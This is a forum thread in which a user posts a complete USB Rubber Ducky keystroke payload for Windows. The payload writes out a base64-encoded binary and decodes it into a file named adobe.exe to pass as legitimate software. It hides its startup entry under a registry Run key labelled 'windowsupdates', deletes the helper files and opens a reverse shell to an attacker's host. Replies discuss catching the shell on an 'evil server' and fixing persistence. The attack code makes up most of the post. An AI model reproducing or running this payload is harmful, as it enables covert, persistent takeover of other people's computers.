Jump to content

[Payload] Reverse Shell (dirty Version)


russianmonk

Recommended Posts

Well I wanted to make the original Reverse Shell script a little more useful for "remote administration". I wrote a batch file of this a while ago so I figured I would use it on the ducky....worked perfect. Basically it makes it so the file is in \windows\system32 and makes it run at startup. It first creates runwinupdate.vbs (this allows the command to start the remote program at boot in a hidden cmd window). Next it creates a reg key that runs the vbs script on boot. Then it deleted the reg file after adding it to the registry. Next it creates the winupdate.bat which has the command to run the remote program at start. (I also renamed the remote.exe to adobe.exe...little more sneaky). At the bottom of the code I put a little "cleanup" bat file code. Makes it easier if you are testing it instead of having to delete everything one by one. Any questions or suggestion let me know!

***If this description doesn't make sense sorry....im tired***

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
ENTER
DELAY 400
STRING copy con c:\windows\system32\runwinupdate.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.Run chr(34) & "winupdate.bat" & Chr(34), 0
ENTER
STRING Set WshShell = Nothing
ENTER
CTRL Z
ENTER
STRING copy con c:\windows\system32\dirty.reg
ENTER
STRING REGEDIT4
ENTER
STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
ENTER
STRING "windowsupdates"="C:\\windows\\system32\\runwinupdate.vbs"
ENTER
CTRL Z
ENTER
STRING REGEDIT /s dirty.reg
ENTER
STRING del dirty.reg
ENTER
STRING copy con c:\windows\system32\winupdate.bat
ENTER
STRING @echo off
ENTER
STRING cd /D c:\windows\system32
ENTER
STRING adobe.exe "INSERT YOUR INFO HERE" 8080
ENTER
CTRL Z
ENTER
STRING copy con c:\windows\system32\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING copy con c:\windows\system32\adobeupdate.txt
ENTER
STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA
ENTER
STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA
ENTER
STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS
ENTER
STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA
ENTER
STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2
ENTER
STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A
ENTER
STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA
ENTER
STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA
ENTER
STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq
ENTER
STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF
ENTER
STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv
ENTER
STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp
ENTER
STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm
ENTER
STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A
ENTER
STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s
ENTER
STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9
ENTER
STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp
ENTER
STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY
ENTER
STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B
ENTER
STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk
ENTER
STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA
ENTER
STRING AAxAAADpdL7//wAAAAIAAAAMQAAA
ENTER
CTRL z
ENTER
STRING cscript c:\windows\system32\decoder.vbs c:\windows\system32\adobeupdate.txt c:\windows\system32\adobe.exe
ENTER
STRING del c:\windows\system32\decoder.vbs
ENTER
STRING del c:\windows\system32\adobeupdate.txt
ENTER
STRING c:\windows\system32\adobe.exe "INSERT YOUR INFO HERE" 8080
ENTER
STRING exit
ENTER



Cleanup
Run this in a bat file if you wanna clean up the files

@echo off
del c:\windows\system32\adobe.exe
del c:\windows\system32\winupdate.bat
del c:\windows\system32\runwinupdate.bat
del c:\windows\system32\runwinupdate.vbs
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v windowsupdates
pause
Edited by midnitesnake
correct formatting
Link to comment
Share on other sites

  • 4 months later...

The scripts goal is quite admirable and awesome, and I'm very interested in getting it to work. Unfortunately I'm having trouble getting persistence out of this script. It works great during the session after I plug in the ducky - I get the reverse shell onto my evil server but have after reboot it never returns back up (yes, I'm killing netcat and bringing it backup between reboots). I check HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run on my target machine and theres no entry for winupdate.bat. Instead theres just an entry for Microsoft Security Essentials and the obligatory Default. Any thoughts on why this would be? My only experience doing registry hacks was back in win98 making the Start button say "FU" instead of Start lol...

Any help would be greatly appreciated as always

telot

Link to comment
Share on other sites

  • 5 months later...
  • 3 weeks later...
  • 5 weeks later...

Just FYI. The Social Engineering Toolkit has payloads for teensy/ducky in a menu driven interface.

Do you know if these payloads are kept up to date?

Thanks

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...